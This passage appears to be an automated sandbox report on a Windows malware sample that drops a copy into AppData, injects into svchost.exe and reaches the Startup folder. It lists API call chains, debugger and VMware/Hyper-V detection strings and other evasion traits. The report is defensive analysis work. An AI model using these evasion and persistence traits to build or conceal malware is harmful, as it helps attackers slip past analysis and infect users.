                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0041AADB
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C74A35
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CF55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CF55FD
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00024A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00024A35
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000A55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_000A55FD
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C933C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C933C7
                  Source: C:\Users\user\Desktop\jv4ri.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jv4ri.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040F7E2 Sleep,ExitProcess,5_2_0040F7E2
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040F7E2 Sleep,ExitProcess,12_2_0040F7E2
                  Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 3F73274
                  Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: D33274
                  Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 3263274
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_0041A7D9
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A7D9
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Users\user\Desktop\jv4ri.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-100002
                  Source: C:\Users\user\Desktop\jv4ri.exe API coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 4.8 %
                  Source: C:\Windows\SysWOW64\svchost.exe API coverage: 6.1 %
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CD4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CD4696
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CDC9C7
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CDC93C FindFirstFileW,FindClose,0_2_00CDC93C
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF200
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF35D
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDF65E
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CD3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3A2B
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CD3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3D4E
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDBF27
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00084696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00084696
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0008C93C FindFirstFileW,FindClose,2_2_0008C93C
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0008C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0008C9C7
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0008F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F200
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0008F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F35D
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0008F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008F65E
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00083A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083A2B
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00083D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083D4E
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0008BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008BF27
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00407877 FindFirstFileW,FindNextFileW,5_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0044E8F9 FindFirstFileExA,5_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407CD2
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C74AFE
                  Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                  Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                  Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                  Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                  Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                  Source: Amcache.hve.8.dr Binary or memory string: VMware
                  Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.8.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.8.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: svchost.exe, 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.8.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.8.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.8.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\jv4ri.exeAPI call chain: ExitProcess graph end nodegraph_0-99049
                  Source: C:\Users\user\Desktop\jv4ri.exeAPI call chain: ExitProcess graph end nodegraph_0-99123
                  Source: C:\Users\user\Desktop\jv4ri.exeAPI call chain: ExitProcess graph end nodegraph_0-99235
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE41FD BlockInput,0_2_00CE41FD
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C73B4C
